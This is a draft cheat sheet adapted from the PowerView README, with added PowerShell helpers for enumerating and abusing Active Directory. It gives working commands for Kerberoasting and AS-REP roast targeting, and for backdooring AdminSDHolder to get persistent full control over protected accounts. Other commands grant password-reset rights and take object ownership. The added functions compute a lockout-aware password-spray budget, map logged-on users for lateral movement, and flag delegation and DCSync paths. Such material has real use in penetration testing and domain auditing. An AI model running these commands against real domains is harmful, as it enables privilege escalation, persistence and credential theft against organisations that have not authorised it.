Cheatography

PowerView Cheat Sheet (DRAFT) by

Cheat sheet adapted from Harmj0y's PowerView README on GitHub

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Use an alternate credential for any function

$SecPassword = ConvertTo-SecureString 'MyPassword!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred

Get all users whose password was last changed more than 1 year ago

$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset
returning sam account names and password-last-set times. pwdlastset is stored as a UTC FILETIME, which is why the threshold is converted with ToFileTime(). Accounts flagged "must change password at next logon" have pwdlastset=0 and will also match; add (!(pwdlastset=0)) to the filter to drop them

Get all enabled users

Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
returning distinguishednames

Get disabled users

Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
Get-DomainUser -UACFilter ACCOUNTDISABLE

Users that require a smart card

Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
Get-DomainUser -UACFilter SMARTCARD_REQUIRED

Find all service accounts in "Domain Admins"

Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}
matching on memberof only catches direct membership; service accounts nested through another group need Get-DomainGroupMember -Recurse

Unconstrained delegation

$Computers = Get-DomainComputer -Unconstrained
$Users = Get-DomainUser -AllowDelegation -AdminCount
Enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation. Domain controllers always carry the TRUSTED_FOR_DELEGATION flag, so expect every DC in $Computers; the member servers are the interesting ones
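Added example for the userAccountControl sections above (enabled/disabled, smart card, unconstrained delegation). This is not PowerView code: it builds the 1.2.840.113556.1.4.803 bitwise filter for any combination of flags, so the same query shape works for flags that have no -UACFilter shortcut and for AND/NOT combinations. Flag values are the documented UF_* constants; the three queries at the end assume PowerView is already loaded.

```powershell
# Added example, not PowerView code: build the userAccountControl bitwise filters
# used above for any combination of flags. Values are the documented UF_* constants;
# PowerView's -UACFilter names are the same.
$UacFlag = @{
    SCRIPT = 1; ACCOUNTDISABLE = 2; HOMEDIR_REQUIRED = 8; LOCKOUT = 16
    PASSWD_NOTREQD = 32; PASSWD_CANT_CHANGE = 64; ENCRYPTED_TEXT_PWD_ALLOWED = 128
    NORMAL_ACCOUNT = 512; INTERDOMAIN_TRUST_ACCOUNT = 2048; WORKSTATION_TRUST_ACCOUNT = 4096
    SERVER_TRUST_ACCOUNT = 8192; DONT_EXPIRE_PASSWORD = 65536; SMARTCARD_REQUIRED = 262144
    TRUSTED_FOR_DELEGATION = 524288; NOT_DELEGATED = 1048576; USE_DES_KEY_ONLY = 2097152
    DONT_REQ_PREAUTH = 4194304; PASSWORD_EXPIRED = 8388608
    TRUSTED_TO_AUTH_FOR_DELEGATION = 16777216; PARTIAL_SECRETS_ACCOUNT = 67108864
}
# LDAP_MATCHING_RULE_BIT_AND: matches when every bit of the value is set in the attribute.
$BitAnd = '1.2.840.113556.1.4.803'

function New-UacFilter {
    param(
        [string[]]$Set = @(),     # flags that must be present
        [string[]]$Clear = @(),   # flags that must be absent
        [string]$Extra = ''       # optional extra clause ANDed in, e.g. '(servicePrincipalName=*)'
    )
    foreach ($f in ($Set + $Clear)) {
        if (-not $UacFlag.ContainsKey($f)) { throw "unknown userAccountControl flag: $f" }
    }
    $clauses = @()
    foreach ($f in $Set)   { $clauses += "(userAccountControl:${BitAnd}:=$($UacFlag[$f]))" }
    foreach ($f in $Clear) { $clauses += "(!(userAccountControl:${BitAnd}:=$($UacFlag[$f])))" }
    if ($Extra) { $clauses += $Extra }
    "(&$($clauses -join ''))"
}

# Enabled accounts flagged as not needing a password at all
Get-DomainUser -LDAPFilter (New-UacFilter -Set PASSWD_NOTREQD -Clear ACCOUNTDISABLE) -Properties samaccountname

# Enabled accounts with a never-expiring password that also carry an SPN: prime Kerberoast targets
Get-DomainUser -LDAPFilter (New-UacFilter -Set DONT_EXPIRE_PASSWORD -Clear ACCOUNTDISABLE -Extra '(servicePrincipalName=*)') -Properties samaccountname,pwdlastset

# Unconstrained delegation on member servers only. Domain controllers always carry
# TRUSTED_FOR_DELEGATION, so the plain -Unconstrained query is padded with every DC;
# excluding SERVER_TRUST_ACCOUNT leaves the hosts actually worth targeting.
Get-DomainComputer -LDAPFilter (New-UacFilter -Set TRUSTED_FOR_DELEGATION -Clear SERVER_TRUST_ACCOUNT) -Properties dnshostname
```

New-UacFilter only emits the 803 (bitwise AND) rule; the 804 OID is bitwise OR and is rarely what you want for UAC checks.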

Perform Kerberoasting

Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"

Logged-on users on any server in the domain

Get-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_.dnshostname}}
Get the logged-on users for all machines in any OU whose name matches *server* in a particular domain. Get-NetLoggedOn needs the dnshostname string, not the whole computer object
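Added example that expands the one-liner above into a sweep that survives unreachable hosts; it is not PowerView code. Get-NetLoggedOn (NetWkstaUserEnum) needs local admin on the target, while Get-NetSession (NetSessionEnum) works for ordinary users on hosts older than the Server 2016 / Windows 10 hardening, so both are tried per host. The OU pattern, domain, and delay are placeholders.

```powershell
# Added example, not PowerView code: sweep every computer under the matching OUs for
# logged-on users and sessions, emitting one object per (host, user) instead of dying
# on the first unreachable or access-denied host.
function Get-ServerOuLogon {
    param(
        [string]$OuPattern = '*server*',   # LDAP wildcard matched against the OU name
        [string]$Domain,
        [int]$DelayMs = 250,               # pause between hosts to keep the noise down
        [switch]$SkipPing                  # set when ICMP is filtered
    )
    $DomArgs = @{}
    if ($Domain) { $DomArgs['Domain'] = $Domain }

    $Hosts = Get-DomainOU -Identity $OuPattern @DomArgs |
        ForEach-Object { Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname @DomArgs } |
        ForEach-Object { $_.dnshostname } |
        Where-Object { $_ } |
        Sort-Object -Unique

    foreach ($h in $Hosts) {
        if (-not $SkipPing -and -not (Test-Connection -ComputerName $h -Count 1 -Quiet)) {
            Write-Verbose "$h unreachable, skipping"
            continue
        }
        # Requires local admin on $h; silently yields nothing otherwise
        foreach ($u in (Get-NetLoggedOn -ComputerName $h -ErrorAction SilentlyContinue)) {
            [PSCustomObject]@{ Computer = $h; Source = 'LoggedOn'; User = "$($u.LogonDomain)\$($u.UserName)"; From = $null }
        }
        # SMB sessions: works unauthenticated-ish on older hosts, also shows where the user came from
        foreach ($s in (Get-NetSession -ComputerName $h -ErrorAction SilentlyContinue)) {
            [PSCustomObject]@{ Computer = $h; Source = 'Session'; User = $s.UserName; From = $s.CName }
        }
        Start-Sleep -Milliseconds $DelayMs
    }
}

# Interactive logons of privileged users on servers are the lateral-movement map.
# Machine accounts end in '$' and are dropped.
Get-ServerOuLogon -Domain testlab.local -Verbose |
    Where-Object { $_.User -notmatch '\$$' } |
    Sort-Object User, Computer -Unique |
    Format-Table -AutoSize
```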

Give 'will' the right to reset 'matt's password

Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose
grant user 'will' the User-Force-Change-Password extended right on 'matt' (reset without knowing the current password)

Audit the permissions of AdminSDHolder

Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs
audit the permissions of AdminSDHolder, resolving GUIDs

Backdoor AdminSDHolder

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
backdoor the ACLs of all protected (adminCount=1) accounts with the 'matt' account through AdminSDHolder abuse; SDProp copies the AdminSDHolder ACL onto them on its next run (every 60 minutes by default)

DCSync rights

Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') }
retrieve most users who can perform DC replication for dev.testlab.local (i.e. DCSync). Get-DomainObjectAcl exposes the resolved extended right as ObjectAceType; the older Get-ObjectAcl name ObjectType does not exist on these objects and would silently match nothing. "Most" because a principal needs both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, and WriteDacl/WriteOwner on the domain object also lead there
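Added example for the DCSync section above; it is not PowerView code. Instead of a flat ACE list it groups the ACEs on the domain head by principal, resolves the SID, checks for the required pair of replication rights (or GenericAll, or WriteDacl/WriteOwner which allow self-granting), and flags the principals that are expected to hold them. The domain DN is a placeholder.

```powershell
# Added example, not PowerView code: per-principal DCSync verdict for the domain head.
function Find-DCSyncPrincipal {
    param(
        [Parameter(Mandatory = $true)][string]$DomainDN,   # e.g. 'dc=dev,dc=testlab,dc=local'
        [string]$Domain
    )
    $DomArgs = @{}
    if ($Domain) { $DomArgs['Domain'] = $Domain }

    # SIDs expected to replicate: Domain Controllers (RID 516), Enterprise Domain Controllers,
    # Domain Admins (512), Enterprise Admins (519), builtin Administrators
    $Expected = '-516$|^S-1-5-9$|-512$|-519$|^S-1-5-32-544$'

    # Deny ACEs are dropped; every remaining ACE is grouped by the principal it grants to
    Get-DomainObjectAcl -Identity $DomainDN -ResolveGUIDs @DomArgs |
        Where-Object { $_.AceType -match 'AccessAllowed' } |
        Group-Object { $_.SecurityIdentifier.Value } |
        ForEach-Object {
            $sid  = $_.Name
            $aces = $_.Group
            $get    = [bool]($aces | Where-Object { $_.ObjectAceType -eq 'DS-Replication-Get-Changes' })
            $getAll = [bool]($aces | Where-Object { $_.ObjectAceType -eq 'DS-Replication-Get-Changes-All' })
            $genAll = [bool]($aces | Where-Object { $_.ActiveDirectoryRights -match 'GenericAll' })
            $dacl   = [bool]($aces | Where-Object { $_.ActiveDirectoryRights -match 'WriteDacl|WriteOwner' })
            if (-not ($get -or $getAll -or $genAll -or $dacl)) { return }

            # Both Get-Changes rights are needed for a full DCSync; one alone is a partial finding
            $verdict = 'partial replication right only'
            if ($dacl) { $verdict = 'can grant itself DCSync' }
            if ($genAll -or ($get -and $getAll)) { $verdict = 'DCSync' }

            [PSCustomObject]@{
                Principal = (ConvertFrom-SID -ObjectSid $sid @DomArgs)
                SID       = $sid
                Verdict   = $verdict
                Expected  = ($sid -match $Expected)
            }
        }
}

# Anything with Verdict 'DCSync' and Expected $false is a finding
Find-DCSyncPrincipal -DomainDN 'dc=dev,dc=testlab,dc=local' |
    Sort-Object Expected, Verdict |
    Format-Table -AutoSize
```

Group membership is not expanded here: a principal listed as Expected may be a group whose members are not expected, so follow up with Get-DomainGroupMember -Recurse on any group in the output.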

Get the groups a user is effectively a member of

Get-DomainGroup -MemberIdentity <User/Group>

Get the effective members of a group, recursing down

Get-DomainGroupMember -Identity "Domain Admins" -Recurse

Return the local groups of a remote server

Get-NetLocalGroup SERVER.domain.local

Enumerate the current domain policy

$DomainPolicy = Get-DomainPolicy -Policy Domain
$DomainPolicy.KerberosPolicy # useful for golden tickets ;)
$DomainPolicy.SystemAccess # password age/etc.

Enumerate who has rights to 'matt' in testlab

Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local
enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names

Find all users with an SPN set

Get-DomainUser -SPN

No Kerberos pre-authentication required (AS-REP roastable)

Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH

Save a PowerView object to disk for later usage

Get-DomainUser | Export-Clixml user.xml
$Users = Import-Clixml user.xml

Specific user's RDP access in the domain

Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP
enumerate what machines a given user in the specified domain has RDP access rights to

Machines a user/group has local admin rights to

Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
Enumerate what machines a particular user/group identity has local admin rights to, as granted through GPO restricted groups / group policy preferences
Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation

Find all computers in a given OU

Get-DomainComputer -SearchBase "ldap://OU=..."

Get the DNS names of the computers a GPP password applies to

Get-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}

Enumerate the current DC policy

$DCPolicy = Get-DomainPolicy -Policy DC
$DCPolicy.PrivilegeRights
user privilege rights on the DC
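Added example for the domain-policy and DC-policy sections; it is not PowerView code. It turns the raw policy dumps into two things a tester acts on: a lockout-aware spray budget from SystemAccess, and a resolved list of who holds dangerous user rights on the domain controllers from PrivilegeRights (GptTmpl.inf stores holders as '*SID' entries). The domain name and the privilege list are placeholders.

```powershell
# Added example, not PowerView code: spray budget from the domain policy and
# user-right holders from the DC policy.
function Get-SprayBudget {
    param([string]$Domain)
    $DomArgs = @{}
    if ($Domain) { $DomArgs['Domain'] = $Domain }
    $Sys = (Get-DomainPolicy -Policy Domain @DomArgs).SystemAccess
    $Threshold = [int]$Sys.LockoutBadCount        # 0 = lockout disabled
    $Window    = [int]$Sys.ResetLockoutCount      # minutes until the bad-password counter resets
    # one attempt below the threshold per window; -1 means no lockout is configured
    $Safe = if ($Threshold -gt 0) { $Threshold - 1 } else { -1 }
    # Fine-grained password policies override these values for the principals they apply to.
    # By default only admins can read the PSO container, so an empty result is not proof of absence.
    $Pso = @(Get-DomainObject -LDAPFilter '(objectClass=msDS-PasswordSettings)' -Properties name,'msds-lockoutthreshold','msds-psoappliesto' @DomArgs)
    [PSCustomObject]@{
        LockoutThreshold      = $Threshold
        ObservationMinutes    = $Window
        LockoutMinutes        = [int]$Sys.LockoutDuration
        MinPasswordLength     = [int]$Sys.MinimumPasswordLength
        ComplexityRequired    = ([int]$Sys.PasswordComplexity -eq 1)
        SafeAttemptsPerWindow = $Safe
        FineGrainedPolicies   = $Pso.Count
    }
}

function Get-DCPrivilegeHolder {
    param(
        [string[]]$Privilege = @('SeEnableDelegationPrivilege', 'SeBackupPrivilege',
                                 'SeRestorePrivilege', 'SeDebugPrivilege', 'SeTcbPrivilege',
                                 'SeTakeOwnershipPrivilege'),
        [string]$Domain
    )
    $DomArgs = @{}
    if ($Domain) { $DomArgs['Domain'] = $Domain }
    $Rights = (Get-DomainPolicy -Policy DC @DomArgs).PrivilegeRights
    foreach ($p in $Privilege) {
        # GptTmpl.inf stores holders as a comma-separated list of '*SID' entries
        $Holders = @($Rights.$p) |
            ForEach-Object { "$_" -split ',' } |
            ForEach-Object { $_.Trim().TrimStart('*') } |
            Where-Object { $_ }
        foreach ($sid in $Holders) {
            $Name = if ($sid -match '^S-1-') { ConvertFrom-SID -ObjectSid $sid @DomArgs } else { $sid }
            [PSCustomObject]@{ Privilege = $p; SID = $sid; Principal = $Name }
        }
    }
}

Get-SprayBudget -Domain testlab.local

# SeEnableDelegationPrivilege holders can configure delegation on accounts; SeBackup/SeRestore
# on a DC is a path to NTDS.dit. Anything beyond builtin Administrators needs explaining.
Get-DCPrivilegeHolder -Domain testlab.local |
    Where-Object { $_.SID -ne 'S-1-5-32-544' } |
    Format-Table -AutoSize
```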

Set the owner of 'dfm' in the domain to 'harmj0y'

Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y